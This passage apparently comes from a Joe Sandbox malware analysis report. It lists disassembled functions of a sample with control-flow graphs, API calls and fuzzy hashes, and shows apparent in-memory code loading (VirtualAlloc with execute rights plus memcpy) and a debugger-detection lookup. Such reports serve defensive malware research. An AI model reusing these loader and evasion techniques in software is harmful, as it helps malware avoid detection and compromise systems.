                                                                                  control_flow_graph 387 7fe4344e-7fe4345f lstrcmpiA 388 7fe43461-7fe43468 387->388 389 7fe43469-7fe43473 LoadLibraryA 387->389
                                                                                  APIs
                                                                                  • lstrcmpiA.KERNEL32(?,psdk.dll), ref: 7FE43457
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 7FE4346D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadlstrcmpi
                                                                                  • String ID: psdk.dll
                                                                                  • API String ID: 2835099494-3943316854
                                                                                  • Opcode ID: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction ID: 97d830ea87723066c88d8f375328ca6ed4df18e57f180154a0a5a4c893f5857c
                                                                                  • Opcode Fuzzy Hash: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction Fuzzy Hash: F4C0C939208300ABDA024B55E908A197BA7AB80A55B54851CB84584120C330D429AB02
                                                                                  Function 7FE4194A Relevance: 5.1, APIs: 4, Instructions: 96memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 390 7fe4194a-7fe4196d call 7fe4257f 393 7fe41a53-7fe41a57 390->393 394 7fe41973-7fe41976 390->394 394->393 395 7fe4197c-7fe41982 394->395 395->393 396 7fe41988-7fe41992 call 7fe41a58 395->396 396->393 399 7fe41998-7fe419ad VirtualAlloc 396->399 399->393 400 7fe419b3-7fe419d3 memcpy 399->400 401 7fe41a05-7fe41a1d call 7fe41b03 400->401 402 7fe419d5 400->402 408 7fe41a45-7fe41a4d VirtualFree 401->408 409 7fe41a1f-7fe41a37 call 7fe41c64 401->409 403 7fe419d8-7fe419dc 402->403 405 7fe419f6-7fe41a03 403->405 406 7fe419de-7fe419f4 memcpy 403->406 405->401 405->403 406->405 408->393 409->408 412 7fe41a39-7fe41a3e 409->412 412->408 413 7fe41a40 412->413 413->408
                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040,00000000,?,?,?), ref: 7FE419A3
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE419C2
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE419EC
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 7FE41A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtualmemcpy$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 788548360-0
                                                                                  • Opcode ID: 1fba82f6f1daba72e5720242b73029a30e16bbe2dfffd2ab4a80a53515d399fc
                                                                                  • Instruction ID: d3b4805ca6afd1a5d8c4d5f4bd2ba4f5957bf034018e57e24973636439659fbd
                                                                                  • Opcode Fuzzy Hash: 1fba82f6f1daba72e5720242b73029a30e16bbe2dfffd2ab4a80a53515d399fc
                                                                                  • Instruction Fuzzy Hash: 6B31F672900304BFCF228F65ED45ABE77A9EF40369B20551EF906E3100E738E910A760
                                                                                  Function 004081D0 Relevance: 4.7, APIs: 3, Instructions: 198COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: PathTemp
                                                                                  • String ID:
                                                                                  • API String ID: 2920410445-0
                                                                                  • Opcode ID: 99ea51cc2d78c3489aa5ba24630fdde467a1d418e431930fb195c39f02273379
                                                                                  • Instruction ID: f11b4dce29de50892480c20cbddc22f8b8c2a836f0274655df0ab0b529399c2f
                                                                                  • Opcode Fuzzy Hash: 99ea51cc2d78c3489aa5ba24630fdde467a1d418e431930fb195c39f02273379
                                                                                  • Instruction Fuzzy Hash: 0271E470E002089BEF14DBA8DE85BDEBB76EF45304F60412ED414772C2DB799989CB95
                                                                                  Function 00419712 Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 472 419712-41972e 473 419734-419736 472->473 474 4198ed 472->474 475 419758-419779 473->475 476 419738-41974b call 413c44 call 413c57 call 41569f 473->476 477 4198ef-4198f3 474->477 478 419780-419786 475->478 479 41977b-41977e 475->479 492 419750-419753 476->492 478->476 481 419788-41978d 478->481 479->478 479->481 484 41978f-41979b call 41f87f 481->484 485 41979e-4197af call 4192b9 481->485 484->485 493 4197b1-4197b3 485->493 494 4197f0-419802 485->494 492->477 497 4197b5-4197bd 493->497 498 4197da-4197e6 call 418ea7 493->498 495 419804-41980d 494->495 496 419849-41986b WriteFile 494->496 504 419839-419847 call 41932a 495->504 505 41980f-419812 495->505 501 419876 496->501 502 41986d-419873 GetLastError 496->502 499 4197c3-4197d0 call 419251 497->499 500 41987f-419882 497->500 508 4197eb-4197ee 498->508 515 4197d3-4197d5 499->515 510 419885-41988a 500->510 509 419879-41987e 501->509 502->501 504->508 511 419814-419817 505->511 512 419829-419837 call 4194ee 505->512 508->515 509->500 516 4198e8-4198eb 510->516 517 41988c-419891 510->517 511->510 518 419819-419827 call 419405 511->518 512->508 515->509 516->477 521 419893-419898 517->521 522 4198bd-4198c9 517->522 518->508 526 4198b1-4198b8 call 413c21 521->526 527 41989a-4198ac call 413c57 call 413c44 521->527 524 4198d0-4198e3 call 413c57 call 413c44 522->524 525 4198cb-4198ce 522->525 524->492 525->474 525->524 526->492 527->492
                                                                                  APIs
                                                                                    • Part of subcall function 00418EA7: GetConsoleCP.KERNEL32(?,00403FD0,00000000), ref: 00418EEF
                                                                                  • WriteFile.KERNELBASE(?,00000000,0042F8A8,00000000,00000000,00000000,00403FD0,00403FD0,00403FD0,00000000,?,?,00412F15,?,0042F8A8,00000010), ref: 00419863
                                                                                  • GetLastError.KERNEL32(?,00412F15,?,0042F8A8,00000010,00403FD0), ref: 0041986D
                                                                                  • __dosmaperr.LIBCMT ref: 004198B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 251514795-0
                                                                                  • Opcode ID: db2785baaafd5d33740c238dac4a58e1619d81f25d33ef0c512f06196b3c93d2
                                                                                  • Instruction ID: 9cc85a0dd55b67ab028b7af81f9f607912d675398f38ecd83fa53986d5a6a907
                                                                                  • Opcode Fuzzy Hash: db2785baaafd5d33740c238dac4a58e1619d81f25d33ef0c512f06196b3c93d2
                                                                                  • Instruction Fuzzy Hash: AE51D571A1010AABDB11AFA5C8A1BEFBBB8EF05314F140017E410B7291D678DDC2C7A9
                                                                                  Function 004171A4 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 539 4171a4-4171b8 call 4189ae 542 4171ba-4171bc 539->542 543 4171be-4171c6 539->543 544 41720c-41722c call 41891d 542->544 545 4171d1-4171d4 543->545 546 4171c8-4171cf 543->546 556 41723a 544->556 557 41722e-417238 call 413c21 544->557 549 4171f2-417202 call 4189ae CloseHandle 545->549 550 4171d6-4171da 545->550 546->545 548 4171dc-4171f0 call 4189ae * 2 546->548 548->542 548->549 549->542 559 417204-41720a GetLastError 549->559 550->548 550->549 561 41723c-41723f 556->561 557->561 559->544
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,00403FD0,?,004170D2,00403FD0,0042F9C8,0000000C,00417184,0042F8A8), ref: 004171FA
                                                                                  • GetLastError.KERNEL32(?,004170D2,00403FD0,0042F9C8,0000000C,00417184,0042F8A8), ref: 00417204
                                                                                  • __dosmaperr.LIBCMT ref: 0041722F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2583163307-0
                                                                                  • Opcode ID: 6908ff5dfa70710e0662e61caffb0e064024c66fbde91bcd673d87ef52ad0c2e
                                                                                  • Instruction ID: 7ce24aeb3b457cde2064b006eaf7bf4ecb246a55085963687a4729e3d68955cc
                                                                                  • Opcode Fuzzy Hash: 6908ff5dfa70710e0662e61caffb0e064024c66fbde91bcd673d87ef52ad0c2e
                                                                                  • Instruction Fuzzy Hash: B80108336181246AC2212335AD457FF77695B96738F2A025FF819873C2DE7C8CC6459E
                                                                                  Function 0041E5B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: nA
                                                                                  • API String ID: 269201875-513057715
                                                                                  • Opcode ID: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                                                                  • Instruction ID: d663fc80b272b8a057757731ab1e26b7e4720bcc169cf5bf07760d1f3ec010b9
                                                                                  • Opcode Fuzzy Hash: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                                                                  • Instruction Fuzzy Hash: D7014F72C00159BFCF01AFA9CC01AEE7FB5AF08314F54416AFD18E2191E6758AA1DB95
                                                                                  Function 00405535 Relevance: 3.3, APIs: 2, Instructions: 291COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0040553E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: a3fd7b2dd5843c2e78c4fbfdf0bf11fda5219a20445fec9a564139c64b9d6f8e
                                                                                  • Instruction ID: aafc41d1c8b996d28da95565e1ec9f3f14bbbc7b55c026b0efb249c1e06f731c
                                                                                  • Opcode Fuzzy Hash: a3fd7b2dd5843c2e78c4fbfdf0bf11fda5219a20445fec9a564139c64b9d6f8e
                                                                                  • Instruction Fuzzy Hash: 89915871A101046BEB08EB39DD85BDE7A66DF81304F50412EF405A72C6D77DDAE08B9D
                                                                                  Function 00405662 Relevance: 3.3, APIs: 2, Instructions: 280COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405665
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 314731c18a2b21c623c6fbaed99f498d9c70d8af3019a023a714a8704af5fd36
                                                                                  • Instruction ID: 7989f3048b54084f9e1941b3ff00e520752aeddce9e7fdf88fea470578a0bae1
                                                                                  • Opcode Fuzzy Hash: 314731c18a2b21c623c6fbaed99f498d9c70d8af3019a023a714a8704af5fd36
                                                                                  • Instruction Fuzzy Hash: 68814671A101045BEB08EB39DE85BDE7A65EF82304F50813EF405A72C6D77DDAD08B99
                                                                                  Function 004059D7 Relevance: 3.3, APIs: 2, Instructions: 277COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 004059DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 1d07c9148bdefb32ef61e4f954d7e6172c15407d86d33c5d62cec66a09a1155f
                                                                                  • Instruction ID: c30596db28ba8802e0a08b4faeb92150c568ec13e721374dade42458eae75ae5
                                                                                  • Opcode Fuzzy Hash: 1d07c9148bdefb32ef61e4f954d7e6172c15407d86d33c5d62cec66a09a1155f
                                                                                  • Instruction Fuzzy Hash: BF816871A101046BEB08EB39EE85BDE7A65EF81304F50413EF405A72C6D77DDAD08B99
                                                                                  Function 00405AFE Relevance: 3.3, APIs: 2, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405B01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 9cbf0d877ce6f02605d611c5c7a93f8b3ff92a9ad9e68ae296fb3071702b56cf
                                                                                  • Instruction ID: b1b8c6065ba3e6a4b4c8c0348a68f2175546529b156428543fdc97b58eddcd1f
                                                                                  • Opcode Fuzzy Hash: 9cbf0d877ce6f02605d611c5c7a93f8b3ff92a9ad9e68ae296fb3071702b56cf
                                                                                  • Instruction Fuzzy Hash: 32815771A101045BEB18EB38DE85BDE7A65EF82304F50813EF405A72C6D77DEAD08B99
                                                                                  Function 00405C25 Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405C28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 87d2a4fea2b676298243134584ae01a2ec9680c213aed66c3269f2ffa0a003bd
                                                                                  • Instruction ID: 43a5af01782612872d48bbb9aab573b890c583c9219427ce0380f37141500e05
                                                                                  • Opcode Fuzzy Hash: 87d2a4fea2b676298243134584ae01a2ec9680c213aed66c3269f2ffa0a003bd
                                                                                  • Instruction Fuzzy Hash: A3814671A102045BEB08EB39DE85BDE7A65DF81308F50813EF406A72C6D77DDAD08B99
                                                                                  Function 00405D4C Relevance: 3.3, APIs: 2, Instructions: 274COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00405D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 38512c1058b596419008fed6d9ab916b03fddf309e87c6d97262f48667d19aee
                                                                                  • Instruction ID: 907539a6c3e0ced6ea4cc5e24de2ec7c52cab323c5d8f2b5e3eaf8b8c7df7a27
                                                                                  • Opcode Fuzzy Hash: 38512c1058b596419008fed6d9ab916b03fddf309e87c6d97262f48667d19aee
                                                                                  • Instruction Fuzzy Hash: BF814671A101045BEB18EB38DE89BDE7A65EF82304F10812EF405A72C6D77DDAD08B99
                                                                                  Function 004085B3 Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000), ref: 004085C5
                                                                                  • GetFileAttributesA.KERNELBASE(?), ref: 004085D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                  • String ID:
                                                                                  • API String ID: 3401506121-0
                                                                                  • Opcode ID: 9a994abf38645f42e0d43bfd910a2925de3668c0b74e43fbcc275a66fa5ddb03
                                                                                  • Instruction ID: 8079733bcbe2950e5d0f636f5b355f17e958773a08b757d5bd9d82054ba5e247
                                                                                  • Opcode Fuzzy Hash: 9a994abf38645f42e0d43bfd910a2925de3668c0b74e43fbcc275a66fa5ddb03
                                                                                  • Instruction Fuzzy Hash: 0B412572E001085BDF08FB68DEC669DB736AF45314FA40A3EE840B33C2DB3999854799
                                                                                  Function 00405F60 Relevance: 2.0, APIs: 1, Instructions: 489COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_taskPathTempVersion
                                                                                  • String ID:
                                                                                  • API String ID: 623340063-0
                                                                                  • Opcode ID: 33e4a35236e1019fdbe2a18c1df4e65fb34ccd8a2abdb92abaa337cfa6ee71f8
                                                                                  • Instruction ID: fb792c8c106df02e49b6a6427362400e361c90b7f7c71ceccf4e4972fba4ae9e
                                                                                  • Opcode Fuzzy Hash: 33e4a35236e1019fdbe2a18c1df4e65fb34ccd8a2abdb92abaa337cfa6ee71f8
                                                                                  • Instruction Fuzzy Hash: 56F148B1A101005BEB08EB78DD86BDE7A25AF81308F50413EF406A72D7D77DDAE48799
                                                                                  Function 00416EAF Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __wsopen_s
                                                                                  • String ID:
                                                                                  • API String ID: 3347428461-0
                                                                                  • Opcode ID: 70db65dbdf0e7b6649e90cedc689232849f3fbc141ef11dc2f9634a943c778e5
                                                                                  • Instruction ID: eaa4e90745c801541314f701e2792930993230061a6c6cff315485bb73a7e69e
                                                                                  • Opcode Fuzzy Hash: 70db65dbdf0e7b6649e90cedc689232849f3fbc141ef11dc2f9634a943c778e5
                                                                                  • Instruction Fuzzy Hash: 95115775A0420AAFCF05DF58E9419CB7BF9EF48304F11406AF809EB311D670EA21CBA8
                                                                                  Function 004185E4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041B7DF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00417AE4,00000001,00000364,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 0041B820
                                                                                  • _free.LIBCMT ref: 00418653
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: 8bedc48bd71ed51189256198d5362878c3b97d26ee5e3fae265640fe63e848fe
                                                                                  • Instruction ID: 53b5a2407131a4f3f998bdefa401e25b78b36e766fac4dc8f21d8098b97500a7
                                                                                  • Opcode Fuzzy Hash: 8bedc48bd71ed51189256198d5362878c3b97d26ee5e3fae265640fe63e848fe
                                                                                  • Instruction Fuzzy Hash: FF0145726043566BC3219F69C8859DAFBA8EB053B4F10062FF545A77C0E774AC51CBA8
                                                                                  Function 00412E4B Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed07c4456f0bc9c0b3aa6dbf4e0a966a1ed5cf35924caf7cbfb78db0de341fb0
                                                                                  • Instruction ID: 29a9b64e9fe2a6f5a867e1a8674db376be1aef73bba835d477039a98118aac13
                                                                                  • Opcode Fuzzy Hash: ed07c4456f0bc9c0b3aa6dbf4e0a966a1ed5cf35924caf7cbfb78db0de341fb0
                                                                                  • Instruction Fuzzy Hash: 9EF0F4329057105AC6213A3BAC05BDB32A88F42338F11071BF824D22C1DBBCE8D2869E
                                                                                  Function 7FE42018 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                    • Part of subcall function 7FE42233: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                    • Part of subcall function 7FE42233: NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
